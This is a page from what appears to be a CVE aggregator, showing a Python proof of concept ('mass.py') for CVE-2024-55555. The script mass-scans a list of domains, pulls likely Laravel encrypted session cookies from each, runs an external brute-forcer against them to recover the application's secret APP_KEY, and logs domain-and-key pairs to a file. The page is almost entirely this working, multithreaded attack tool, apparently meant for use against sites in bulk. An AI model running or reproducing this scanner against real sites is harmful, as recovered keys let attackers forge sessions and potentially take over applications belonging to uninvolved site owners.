4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-55555
README.md
Rendering markdown...
POC / mass.py PY
⬇ Raw GitHub ✕ Close 
import requests
import subprocess
import re
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor
import threading

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.9",
    "Upgrade-Insecure-Requests": "1",
}

result_file = "result.txt"
lock = threading.Lock()

def normalize_url(domain):
    domain = domain.strip()
    if not domain.startswith("http://") and not domain.startswith("https://"):
        domain = "https://" + domain
    return domain

def extract_likely_token(cookies):
    # Cari semua cookie kecuali XSRF-TOKEN
    token_candidates = {
        k: v for k, v in cookies.items()
        if k.upper() != "XSRF-TOKEN"
    }
    # Pilih cookie dengan panjang value terpanjang
    if token_candidates:
        likely = max(token_candidates.items(), key=lambda item: len(item[1]))
        return likely[1]
    return None

def bruteforce_token(token):
    try:
        cmd = [
            "python3",
            "laravel_crypto_killer.py",
            "bruteforce",
            "-v",
            token
        ]
        result = subprocess.run(cmd, capture_output=True, text=True)
        return result.stdout
    except Exception as e:
        return str(e)

def extract_key(output):
    match = re.search(r"Key\s*:\s*(base64:[A-Za-z0-9+/=]+)", output)
    return match.group(1) if match else None

def check_domain(domain):
    url = normalize_url(domain)
    try:
        print(f"[*] Checking {url}")
        response = requests.get(url, headers=headers, timeout=10)
        token = extract_likely_token(response.cookies)
        if not token:
            print(f"[-] No valid Laravel-style cookie found for {url}")
            return

        output = bruteforce_token(token)
        key = extract_key(output)

        if key:
            domain_name = urlparse(url).netloc
            result_line = f"{domain_name}|{key}"
            with lock:
                with open(result_file, "a") as f:
                    f.write(result_line + "\n")
            print(f"[+] Key found for {domain_name}: {key}")
        else:
            print(f"[-] No key found for {url}")
    except Exception as e:
        print(f"[!] Error with {url}: {e}")

def main():
    with open("list.txt", "r") as f:
        targets = [line.strip() for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=10) as executor:
        executor.map(check_domain, targets)

if __name__ == "__main__":
    main()